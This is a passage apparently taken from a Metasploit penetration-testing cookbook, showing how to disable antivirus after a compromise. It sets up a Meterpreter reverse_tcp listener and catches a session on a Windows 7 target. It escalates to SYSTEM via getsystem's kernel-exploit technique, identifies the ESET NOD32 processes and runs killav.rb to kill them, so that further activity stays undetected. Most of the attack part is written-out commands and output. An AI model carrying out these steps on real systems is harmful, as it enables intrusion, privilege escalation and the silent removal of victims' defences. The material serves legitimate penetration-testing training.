
Using the killav.rb script to disable the antivirus programs

In the previous recipe, we focused on various techniques that can be implemented to bypass the client-side antivirus protection and open an active session. Well, the story doesn't end here. What if we want to download files from the target system, or install a keylogger, and so on? Such activities can raise an alarm in the antivirus. So, once we have gained an active session, our next target should be to kill the antivirus protection silently. This recipe is all about deactivating them. Killing antivirus is essential in order to keep our activities undetected on the target machine.

In this recipe, we will be using some of the Meterpreter scripts available to us during an active session. We have an entire chapter dedicated to Meterpreter scripts, so here, I will just give a quick introduction to Meterpreter scripts and some useful Meterpreter commands.

Getting ready

Let us start with a quick introduction to Meterpreter. Meterpreter is an advanced payload that greatly enhances the power of command execution on the target machine. It is a command interpreter that works by in-memory DLL injection, and it offers many advantages over the plain command shell that most shellcode gives us: it is more flexible, stable, and extensible. It can behave as if several payloads were working together on the target machine, it communicates over the stager's socket, and it exposes a comprehensive client-side Ruby API. We can get a Meterpreter shell by using the payloads available under windows/meterpreter. In this recipe, we will be using the windows/meterpreter/reverse_tcp payload. Our target machine is Windows 7 running the ESET NOD32 antivirus.

We will proceed by setting up our listener in msfconsole and waiting for a back connection:

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh..
   LHOST     192.168.56.101   yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...

How to do it...

1. So, our listener is now ready. Once the client-side attack executes successfully on the target, we will have a Meterpreter session opened in msfconsole:

[*] Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:49188) at 2011-11-29 13:26:55 +0530

meterpreter >

2. Now, we are all set to leverage the powers of Meterpreter in our experiment of killing the antivirus. The first command we will execute is getuid, which prints the user account the Meterpreter server is running under on the system we broke into. That account can be the local administrator, a less privileged user, or SYSTEM:

meterpreter > getuid

Server username: DARKLORD-PC\DARKLORD

3. It doesn't look like we have administrator privileges on the system we just penetrated. So, the next step will be to escalate our privileges so that we can execute commands on the target without interruption. We will use the getsystem command, which tries a series of techniques to elevate the session from the current user to NT AUTHORITY\SYSTEM:

meterpreter > getsystem

...got system (via technique 4)..

4. As we can see, getsystem has successfully elevated our privileges on the penetrated system using technique 4, which in this version of Metasploit is the KiTrap0D kernel exploit (MS10-015). This matters: the named pipe and token duplication techniques that getsystem tries first only work when the session already holds local administrator rights, so from an unprivileged user like this one, getsystem succeeds only if the target is missing that patch. We can check our new escalated ID by again using the getuid command:

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

5. So, now we are running as SYSTEM, which outranks even the local administrator account. The next step will be to run the ps command, which lists all the running processes on the system. We will have to look for the processes that belong to the antivirus running on the target machine (the output has been shortened to fit):

meterpreter > ps

 PID   Name           User                   Path
 ---   ----           ----                   ----
 1060  svchost.exe    NT AUTHORITY\SYSTEM    C:\Windows\System32\...
 1096  svchost.exe    NT AUTHORITY\SYSTEM    C:\Windows\system32\...
 1140  stacsv.exe     NT AUTHORITY\SYSTEM    C:\Windows\System32\...
 1152  dsmonitor.exe  DARKLORD-PC\DARKLORD   C:\Program Files\Uni...
 1744  egui.exe       DARKLORD-PC\DARKLORD   C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
 1832  eset.exe       NT AUTHORITY\SYSTEM    C:\Program Files\ESET\ESET NOD32 Antivirus\eset.exe

6. From the Name and Path columns, we can easily identify the processes that belong to an antivirus instance. In our case, there are two processes responsible for antivirus protection on the target system; they are egui.exe and eset.exe. Let us see how we can use Metasploit to kill these processes.

How it works...

Meterpreter provides a very useful script named killav.rb, which can be used to kill the antivirus processes running on the target system and, thus, disable them. Let us try this script on our Windows 7 target which is running the ESET NOD32 antivirus:

meterpreter > run killav

[*] Killing Antivirus services on the target....

The run command executes a Meterpreter script (a Ruby file shipped under Metasploit's scripts/meterpreter directory) inside the session. killav.rb works by walking the process list, exactly as ps does, and terminating every process whose name appears in its built-in list of known antivirus executables. Once the script has executed, we should run ps again to make sure that all of the antivirus processes have been killed. If none of them are running, the antivirus has been temporarily disabled on the target machine and we can move ahead with our penetration testing process. Two things can leave it running, though: a process whose name is not on the script's list is never touched, and a process that the antivirus protects against termination survives the kill even when we are SYSTEM.

But, what if the processes are still running? Let's find out the solution in the next recipe.

Killing the antiviruses' services from the